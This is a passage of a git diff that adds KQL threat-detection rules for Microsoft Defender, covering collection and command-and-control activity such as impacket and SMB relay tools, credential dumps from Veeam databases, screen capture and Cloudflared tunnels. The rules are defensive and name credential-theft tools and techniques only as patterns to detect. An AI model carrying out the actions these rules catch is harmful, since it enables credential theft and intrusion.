the certificate service +// MITRE Tactic: Collection +// Tags: attack.collection, attack.credential-access, attack.t1557.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains " --adcs " and ProcessCommandLine contains " --port " \ No newline at end of file diff --git a/KQL/rules/Collection/hacktool_impacket_tools_execution.kql b/KQL/rules/Collection/hacktool_impacket_tools_execution.kql new file mode 100644 index 00000000..6d70bb10 --- /dev/null +++ b/KQL/rules/Collection/hacktool_impacket_tools_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - Impacket Tools Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2021-07-24 +// Level: high +// Description: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives) +// MITRE Tactic: Collection +// Tags: attack.collection, attack.execution, attack.credential-access, attack.t1557.001 +// False Positives: +// - Legitimate use of the impacket tools + +DeviceProcessEvents +| where (FolderPath contains "\\goldenPac" or FolderPath contains "\\karmaSMB" or FolderPath contains "\\kintercept" or FolderPath contains "\\ntlmrelayx" or FolderPath contains "\\rpcdump" or FolderPath contains "\\samrdump" or FolderPath contains "\\secretsdump" or FolderPath contains "\\smbexec" or FolderPath contains "\\smbrelayx" or FolderPath contains "\\wmiexec" or FolderPath contains "\\wmipersist") or (FolderPath endswith "\\atexec_windows.exe" or FolderPath endswith "\\dcomexec_windows.exe" or FolderPath endswith "\\dpapi_windows.exe" or FolderPath endswith "\\findDelegation_windows.exe" or FolderPath endswith "\\GetADUsers_windows.exe" or FolderPath endswith "\\GetNPUsers_windows.exe" or FolderPath endswith "\\getPac_windows.exe" or FolderPath endswith "\\getST_windows.exe" or FolderPath endswith "\\getTGT_windows.exe" or FolderPath endswith "\\GetUserSPNs_windows.exe" or FolderPath endswith "\\ifmap_windows.exe" or FolderPath endswith "\\mimikatz_windows.exe" or FolderPath endswith "\\netview_windows.exe" or FolderPath endswith "\\nmapAnswerMachine_windows.exe" or FolderPath endswith "\\opdump_windows.exe" or FolderPath endswith "\\psexec_windows.exe" or FolderPath endswith "\\rdp_check_windows.exe" or FolderPath endswith "\\sambaPipe_windows.exe" or FolderPath endswith "\\smbclient_windows.exe" or FolderPath endswith "\\smbserver_windows.exe" or FolderPath endswith "\\sniff_windows.exe" or FolderPath endswith "\\sniffer_windows.exe" or FolderPath endswith "\\split_windows.exe" or FolderPath endswith "\\ticketer_windows.exe") \ No newline at end of file diff --git a/KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql b/KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql new file mode 100644 index 00000000..f6041c74 --- /dev/null +++ b/KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql @@ -0,0 +1,14 @@ +// Title: Periodic Backup For System Registry Hives Enabled +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-07-01 +// Level: medium +// Description: Detects the enabling of the "EnablePeriodicBackup" registry value. Once enabled, The OS will backup System registry hives on restarts to the "C:\Windows\System32\config\RegBack" folder. Windows creates a "RegIdleBackup" task to manage subsequent backups. +Registry backup was a default behavior on Windows and was disabled as of "Windows 10, version 1803". + +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1113 +// False Positives: +// - Legitimate need for RegBack feature by administrators. + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Control\\Session Manager\\Configuration Manager\\EnablePeriodicBackup" \ No newline at end of file diff --git a/KQL/rules/Collection/potential_smb_relay_attack_tool_execution.kql b/KQL/rules/Collection/potential_smb_relay_attack_tool_execution.kql new file mode 100644 index 00000000..2e442414 --- /dev/null +++ b/KQL/rules/Collection/potential_smb_relay_attack_tool_execution.kql @@ -0,0 +1,12 @@ +// Title: Potential SMB Relay Attack Tool Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2021-07-24 +// Level: critical +// Description: Detects different hacktools used for relay attacks on Windows for privilege escalation +// MITRE Tactic: Collection +// Tags: attack.collection, attack.execution, attack.credential-access, attack.t1557.001 +// False Positives: +// - Legitimate files with these rare hacktool names + +DeviceProcessEvents +| where ((ProcessCommandLine contains ".exe -c \"{" and ProcessCommandLine endswith "}\" -z") or (FolderPath contains "PetitPotam" or FolderPath contains "RottenPotato" or FolderPath contains "HotPotato" or FolderPath contains "JuicyPotato" or FolderPath contains "\\just_dce_" or FolderPath contains "Juicy Potato" or FolderPath contains "\\temp\\rot.exe" or FolderPath contains "\\Potato.exe" or FolderPath contains "\\SpoolSample.exe" or FolderPath contains "\\Responder.exe" or FolderPath contains "\\smbrelayx" or FolderPath contains "\\ntlmrelayx" or FolderPath contains "\\LocalPotato") or (ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains " smbrelay" or ProcessCommandLine contains " ntlmrelay" or ProcessCommandLine contains "cme smb " or ProcessCommandLine contains " /ntlm:NTLMhash " or ProcessCommandLine contains "Invoke-PetitPotam" or (ProcessCommandLine contains ".exe -t " and ProcessCommandLine contains " -p "))) and (not((FolderPath contains "HotPotatoes6" or FolderPath contains "HotPotatoes7" or FolderPath contains "HotPotatoes "))) \ No newline at end of file diff --git a/KQL/rules/Collection/potential_suspicious_activity_using_secedit.kql b/KQL/rules/Collection/potential_suspicious_activity_using_secedit.kql new file mode 100644 index 00000000..102b810c --- /dev/null +++ b/KQL/rules/Collection/potential_suspicious_activity_using_secedit.kql @@ -0,0 +1,12 @@ +// Title: Potential Suspicious Activity Using SeCEdit +// Author: Janantha Marasinghe +// Date: 2022-11-18 +// Level: medium +// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy +// MITRE Tactic: Collection +// Tags: attack.collection, attack.discovery, attack.persistence, attack.defense-evasion, attack.credential-access, attack.privilege-escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082 +// False Positives: +// - Legitimate administrative use + +DeviceProcessEvents +| where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg")) \ No newline at end of file diff --git a/KQL/rules/Collection/powershell_get_clipboard_cmdlet_via_cli.kql b/KQL/rules/Collection/powershell_get_clipboard_cmdlet_via_cli.kql new file mode 100644 index 00000000..45d6cab7 --- /dev/null +++ b/KQL/rules/Collection/powershell_get_clipboard_cmdlet_via_cli.kql @@ -0,0 +1,10 @@ +// Title: PowerShell Get-Clipboard Cmdlet Via CLI +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-05-02 +// Level: medium +// Description: Detects usage of the 'Get-Clipboard' cmdlet via CLI +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1115 + +DeviceProcessEvents +| where ProcessCommandLine contains "Get-Clipboard" \ No newline at end of file diff --git a/KQL/rules/Collection/processes_accessing_the_microphone_and_webcam.kql b/KQL/rules/Collection/processes_accessing_the_microphone_and_webcam.kql new file mode 100644 index 00000000..0c3172f6 --- /dev/null +++ b/KQL/rules/Collection/processes_accessing_the_microphone_and_webcam.kql @@ -0,0 +1,10 @@ +// Title: Processes Accessing the Microphone and Webcam +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-06-07 +// Level: medium +// Description: Potential adversaries accessing the microphone and webcam in an endpoint. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1123 + +DeviceRegistryEvents +| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore\\microphone\\NonPackaged" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore\\webcam\\NonPackaged" \ No newline at end of file diff --git a/KQL/rules/Collection/rar_usage_with_password_and_compression_level.kql b/KQL/rules/Collection/rar_usage_with_password_and_compression_level.kql new file mode 100644 index 00000000..78eedc5e --- /dev/null +++ b/KQL/rules/Collection/rar_usage_with_password_and_compression_level.kql @@ -0,0 +1,13 @@ +// Title: Rar Usage with Password and Compression Level +// Author: @ROxPinTeddy +// Date: 2020-05-12 +// Level: high +// Description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001 +// False Positives: +// - Legitimate use of Winrar command line version +// - Other command line tools, that use these flags + +DeviceProcessEvents +| where ProcessCommandLine contains " -hp" and (ProcessCommandLine contains " -m" or ProcessCommandLine contains " a ") \ No newline at end of file diff --git a/KQL/rules/Collection/recon_information_for_export_with_command_prompt.kql b/KQL/rules/Collection/recon_information_for_export_with_command_prompt.kql new file mode 100644 index 00000000..65fad7a0 --- /dev/null +++ b/KQL/rules/Collection/recon_information_for_export_with_command_prompt.kql @@ -0,0 +1,10 @@ +// Title: Recon Information for Export with Command Prompt +// Author: frack113 +// Date: 2021-07-30 +// Level: medium +// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1119 + +DeviceProcessEvents +| where ((FolderPath endswith "\\tree.com" or FolderPath endswith "\\WMIC.exe" or FolderPath endswith "\\doskey.exe" or FolderPath endswith "\\sc.exe") or (ProcessVersionInfoOriginalFileName in~ ("wmic.exe", "DOSKEY.EXE", "sc.exe"))) and (InitiatingProcessCommandLine contains " > %TEMP%\\" or InitiatingProcessCommandLine contains " > %TMP%\\") \ No newline at end of file diff --git a/KQL/rules/Collection/screen_capture_activity_via_psr_exe.kql b/KQL/rules/Collection/screen_capture_activity_via_psr_exe.kql new file mode 100644 index 00000000..1ddc1555 --- /dev/null +++ b/KQL/rules/Collection/screen_capture_activity_via_psr_exe.kql @@ -0,0 +1,10 @@ +// Title: Screen Capture Activity Via Psr.EXE +// Author: Beyu Denis, oscd.community +// Date: 2019-10-12 +// Level: medium +// Description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1113 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/start" or ProcessCommandLine contains "-start") and FolderPath endswith "\\Psr.exe" \ No newline at end of file diff --git a/KQL/rules/Collection/screen_capture_macos.kql b/KQL/rules/Collection/screen_capture_macos.kql new file mode 100644 index 00000000..e12abbe0 --- /dev/null +++ b/KQL/rules/Collection/screen_capture_macos.kql @@ -0,0 +1,12 @@ +// Title: Screen Capture - macOS +// Author: remotephone, oscd.community +// Date: 2020-10-13 +// Level: low +// Description: Detects attempts to use screencapture to collect macOS screenshots +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1113 +// False Positives: +// - Legitimate user activity taking screenshots + +DeviceProcessEvents +| where FolderPath =~ "/usr/sbin/screencapture" \ No newline at end of file diff --git a/KQL/rules/Collection/suspicious_camera_and_microphone_access.kql b/KQL/rules/Collection/suspicious_camera_and_microphone_access.kql new file mode 100644 index 00000000..df63d384 --- /dev/null +++ b/KQL/rules/Collection/suspicious_camera_and_microphone_access.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Camera and Microphone Access +// Author: Den Iuzvyk +// Date: 2020-06-07 +// Level: high +// Description: Detects Processes accessing the camera and microphone from suspicious folder +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1125, attack.t1123 +// False Positives: +// - Unlikely, there could be conferencing software running from a Temp folder accessing the devices + +DeviceRegistryEvents +| where (RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore*" and RegistryKey contains "\\NonPackaged") and (RegistryKey contains "microphone" or RegistryKey contains "webcam") and (RegistryKey contains ":#Windows#Temp#" or RegistryKey contains ":#$Recycle.bin#" or RegistryKey contains ":#Temp#" or RegistryKey contains ":#Users#Public#" or RegistryKey contains ":#Users#Default#" or RegistryKey contains ":#Users#Desktop#") \ No newline at end of file diff --git a/KQL/rules/Collection/suspicious_manipulation_of_default_accounts_via_net_exe.kql b/KQL/rules/Collection/suspicious_manipulation_of_default_accounts_via_net_exe.kql new file mode 100644 index 00000000..800c1fea --- /dev/null +++ b/KQL/rules/Collection/suspicious_manipulation_of_default_accounts_via_net_exe.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Manipulation Of Default Accounts Via Net.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-01 +// Level: high +// Description: Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001 +// False Positives: +// - Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium + +DeviceProcessEvents +| where (((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) and ProcessCommandLine contains " user " and (ProcessCommandLine contains " Järjestelmänvalvoja " or ProcessCommandLine contains " Rendszergazda " or ProcessCommandLine contains " Администратор " or ProcessCommandLine contains " Administrateur " or ProcessCommandLine contains " Administrador " or ProcessCommandLine contains " Administratör " or ProcessCommandLine contains " Administrator " or ProcessCommandLine contains " guest " or ProcessCommandLine contains " DefaultAccount " or ProcessCommandLine contains " \"Järjestelmänvalvoja\" " or ProcessCommandLine contains " \"Rendszergazda\" " or ProcessCommandLine contains " \"Администратор\" " or ProcessCommandLine contains " \"Administrateur\" " or ProcessCommandLine contains " \"Administrador\" " or ProcessCommandLine contains " \"Administratör\" " or ProcessCommandLine contains " \"Administrator\" " or ProcessCommandLine contains " \"guest\" " or ProcessCommandLine contains " \"DefaultAccount\" " or ProcessCommandLine contains " 'Järjestelmänvalvoja' " or ProcessCommandLine contains " 'Rendszergazda' " or ProcessCommandLine contains " 'Администратор' " or ProcessCommandLine contains " 'Administrateur' " or ProcessCommandLine contains " 'Administrador' " or ProcessCommandLine contains " 'Administratör' " or ProcessCommandLine contains " 'Administrator' " or ProcessCommandLine contains " 'guest' " or ProcessCommandLine contains " 'DefaultAccount' ")) and (not((ProcessCommandLine contains "guest" and ProcessCommandLine contains "/active no"))) \ No newline at end of file diff --git a/KQL/rules/Collection/veeam_backup_database_suspicious_query.kql b/KQL/rules/Collection/veeam_backup_database_suspicious_query.kql new file mode 100644 index 00000000..1fde3264 --- /dev/null +++ b/KQL/rules/Collection/veeam_backup_database_suspicious_query.kql @@ -0,0 +1,10 @@ +// Title: Veeam Backup Database Suspicious Query +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-04 +// Level: medium +// Description: Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1005 + +DeviceProcessEvents +| where (ProcessCommandLine contains "BackupRepositories" or ProcessCommandLine contains "Backups" or ProcessCommandLine contains "Credentials" or ProcessCommandLine contains "HostCreds" or ProcessCommandLine contains "SmbFileShares" or ProcessCommandLine contains "Ssh_creds" or ProcessCommandLine contains "VSphereInfo") and ((ProcessCommandLine contains "VeeamBackup" and ProcessCommandLine contains "From ") and FolderPath endswith "\\sqlcmd.exe") \ No newline at end of file diff --git a/KQL/rules/Collection/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql b/KQL/rules/Collection/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql new file mode 100644 index 00000000..6318e563 --- /dev/null +++ b/KQL/rules/Collection/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql @@ -0,0 +1,10 @@ +// Title: VeeamBackup Database Credentials Dump Via Sqlcmd.EXE +// Author: frack113 +// Date: 2021-12-20 +// Level: high +// Description: Detects dump of credentials in VeeamBackup dbo +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1005 + +DeviceProcessEvents +| where (ProcessCommandLine contains "SELECT" and ProcessCommandLine contains "TOP" and ProcessCommandLine contains "[VeeamBackup].[dbo].[Credentials]") and FolderPath endswith "\\sqlcmd.exe" \ No newline at end of file diff --git a/KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql b/KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql new file mode 100644 index 00000000..755a8f4f --- /dev/null +++ b/KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql @@ -0,0 +1,15 @@ +// Title: Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted +// Author: Sajid Nawaz Khan +// Date: 2024-06-02 +// Level: medium +// Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value. +Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. +This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. + +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1113 +// False Positives: +// - Legitimate use/activation of Windows Recall + +DeviceRegistryEvents +| where ActionType =~ "DeleteValue" and RegistryKey endswith "\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis" \ No newline at end of file diff --git a/KQL/rules/Collection/windows_recall_feature_enabled_registry.kql b/KQL/rules/Collection/windows_recall_feature_enabled_registry.kql new file mode 100644 index 00000000..8ee5e5af --- /dev/null +++ b/KQL/rules/Collection/windows_recall_feature_enabled_registry.kql @@ -0,0 +1,15 @@ +// Title: Windows Recall Feature Enabled - Registry +// Author: Sajid Nawaz Khan +// Date: 2024-06-02 +// Level: medium +// Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0". +Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. +This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. + +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1113 +// False Positives: +// - Legitimate use/activation of Windows Recall + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Software\\Policies\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis" \ No newline at end of file diff --git a/KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql b/KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql new file mode 100644 index 00000000..56b912eb --- /dev/null +++ b/KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql @@ -0,0 +1,16 @@ +// Title: Windows Recall Feature Enabled Via Reg.EXE +// Author: Sajid Nawaz Khan +// Date: 2024-06-02 +// Level: medium +// Description: Detects the enabling of the Windows Recall feature via registry manipulation. +Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0. +Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. +This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. + +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1113 +// False Positives: +// - Legitimate use/activation of Windows Recall + +DeviceProcessEvents +| where (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "Microsoft\\Windows\\WindowsAI" and ProcessCommandLine contains "DisableAIDataAnalysis") and ((ProcessCommandLine contains "add" or ProcessCommandLine contains "0") or ProcessCommandLine contains "delete") \ No newline at end of file diff --git a/KQL/rules/Collection/winrar_compressing_dump_files.kql b/KQL/rules/Collection/winrar_compressing_dump_files.kql new file mode 100644 index 00000000..a62b7e72 --- /dev/null +++ b/KQL/rules/Collection/winrar_compressing_dump_files.kql @@ -0,0 +1,13 @@ +// Title: Winrar Compressing Dump Files +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-04 +// Level: medium +// Description: Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001 +// False Positives: +// - Legitimate use of WinRAR with a command line in which ".dmp" or ".dump" appears accidentally +// - Legitimate use of WinRAR to compress WER ".dmp" files for troubleshooting + +DeviceProcessEvents +| where (ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and ((FolderPath endswith "\\rar.exe" or FolderPath endswith "\\winrar.exe") or ProcessVersionInfoFileDescription =~ "Command line RAR") \ No newline at end of file diff --git a/KQL/rules/Collection/winrar_execution_in_non_standard_folder.kql b/KQL/rules/Collection/winrar_execution_in_non_standard_folder.kql new file mode 100644 index 00000000..1f8fb505 --- /dev/null +++ b/KQL/rules/Collection/winrar_execution_in_non_standard_folder.kql @@ -0,0 +1,12 @@ +// Title: WinRAR Execution in Non-Standard Folder +// Author: Florian Roth (Nextron Systems), Tigzy +// Date: 2021-11-17 +// Level: medium +// Description: Detects a suspicious WinRAR execution in a folder which is not the default installation folder +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001 +// False Positives: +// - Legitimate use of WinRAR in a folder of a software that bundles WinRAR + +DeviceProcessEvents +| where ((FolderPath endswith "\\rar.exe" or FolderPath endswith "\\winrar.exe") or (ProcessVersionInfoFileDescription in~ ("Command line RAR", "WinRAR"))) and (not(((FolderPath contains ":\\Program Files (x86)\\WinRAR\\" or FolderPath contains ":\\Program Files\\WinRAR\\") or FolderPath endswith "\\UnRAR.exe"))) and (not(FolderPath contains ":\\Windows\\Temp\\")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/adsi_cache_file_creation_by_uncommon_tool.kql b/KQL/rules/Command and Control/adsi_cache_file_creation_by_uncommon_tool.kql new file mode 100644 index 00000000..cba2f4eb --- /dev/null +++ b/KQL/rules/Command and Control/adsi_cache_file_creation_by_uncommon_tool.kql @@ -0,0 +1,12 @@ +// Title: ADSI-Cache File Creation By Uncommon Tool +// Author: xknow @xknow_infosec, Tim Shelton +// Date: 2019-03-24 +// Level: medium +// Description: Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool. +// MITRE Tactic: Command and Control +// Tags: attack.t1001.003, attack.command-and-control +// False Positives: +// - Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc. + +DeviceFileEvents +| where (FolderPath contains "\\Local\\Microsoft\\Windows\\SchCache\\" and FolderPath endswith ".sch") and (not((((InitiatingProcessFolderPath endswith ":\\Program Files\\Cylance\\Desktop\\CylanceSvc.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\CCM\\CcmExec.exe" or InitiatingProcessFolderPath endswith ":\\windows\\system32\\dllhost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\system32\\dsac.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\system32\\efsui.exe" or InitiatingProcessFolderPath endswith ":\\windows\\system32\\mmc.exe" or InitiatingProcessFolderPath endswith ":\\windows\\system32\\svchost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\wbem\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith ":\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe") or (InitiatingProcessFolderPath contains ":\\Windows\\ccmsetup\\autoupgrade\\ccmsetup" or InitiatingProcessFolderPath contains ":\\Program Files\\SentinelOne\\Sentinel Agent")) or ((InitiatingProcessFolderPath contains ":\\Program Files\\" and InitiatingProcessFolderPath contains "\\Microsoft Office") and InitiatingProcessFolderPath endswith "\\OUTLOOK.EXE")))) and (not((InitiatingProcessFolderPath endswith ":\\Program Files\\Citrix\\Receiver StoreFront\\Services\\DefaultDomainServices\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe" or InitiatingProcessFolderPath endswith "\\LANDesk\\LDCLient\\ldapwhoami.exe"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/anydesk_temporary_artefact.kql b/KQL/rules/Command and Control/anydesk_temporary_artefact.kql new file mode 100644 index 00000000..11daf9c7 --- /dev/null +++ b/KQL/rules/Command and Control/anydesk_temporary_artefact.kql @@ -0,0 +1,15 @@ +// Title: Anydesk Temporary Artefact +// Author: frack113 +// Date: 2022-02-11 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use + +DeviceFileEvents +| where FolderPath contains "\\AppData\\Roaming\\AnyDesk\\user.conf" or FolderPath contains "\\AppData\\Roaming\\AnyDesk\\system.conf" \ No newline at end of file diff --git a/KQL/rules/Command and Control/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql b/KQL/rules/Command and Control/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql new file mode 100644 index 00000000..a91eace5 --- /dev/null +++ b/KQL/rules/Command and Control/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql @@ -0,0 +1,10 @@ +// Title: Arbitrary File Download Via GfxDownloadWrapper.EXE +// Author: Victor Sergeev, oscd.community +// Date: 2020-10-09 +// Level: medium +// Description: Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and FolderPath endswith "\\GfxDownloadWrapper.exe") and (not(ProcessCommandLine contains "https://gameplayapi.intel.com/")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/cloudflared_portable_execution.kql b/KQL/rules/Command and Control/cloudflared_portable_execution.kql new file mode 100644 index 00000000..7328340e --- /dev/null +++ b/KQL/rules/Command and Control/cloudflared_portable_execution.kql @@ -0,0 +1,13 @@ +// Title: Cloudflared Portable Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-12-20 +// Level: medium +// Description: Detects the execution of the "cloudflared" binary from a non standard location. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090.001 +// False Positives: +// - Legitimate usage of Cloudflared portable versions + +DeviceProcessEvents +| where FolderPath endswith "\\cloudflared.exe" and (not((FolderPath contains ":\\Program Files (x86)\\cloudflared\\" or FolderPath contains ":\\Program Files\\cloudflared\\"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql b/KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql new file mode 100644 index 00000000..ee525a83 --- /dev/null +++ b/KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql @@ -0,0 +1,15 @@ +// Title: Cloudflared Quick Tunnel Execution +// Author: Sajid Nawaz Khan +// Date: 2023-12-20 +// Level: medium +// Description: Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB. +The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com. +The tool has been observed in use by threat groups including Akira ransomware. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090.001 +// False Positives: +// - Legitimate usage of Cloudflare Quick Tunnel + +DeviceProcessEvents +| where (((FolderPath endswith "\\cloudflared.exe" or FolderPath endswith "\\cloudflared-windows-386.exe" or FolderPath endswith "\\cloudflared-windows-amd64.exe") or (SHA256 startswith "2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29" or SHA256 startswith "b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8" or SHA256 startswith "1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039" or SHA256 startswith "0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28" or SHA256 startswith "7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7" or SHA256 startswith "5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373" or SHA256 startswith "ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670" or SHA256 startswith "1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a" or SHA256 startswith "af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0" or SHA256 startswith "39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1" or SHA256 startswith "ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2" or SHA256 startswith "b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac" or SHA256 startswith "f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f" or SHA256 startswith "fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d" or SHA256 startswith "083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499" or SHA256 startswith "44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b" or SHA256 startswith "5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f" or SHA256 startswith "e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032" or SHA256 startswith "c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234" or SHA256 startswith "b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f" or SHA256 startswith "cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058" or SHA256 startswith 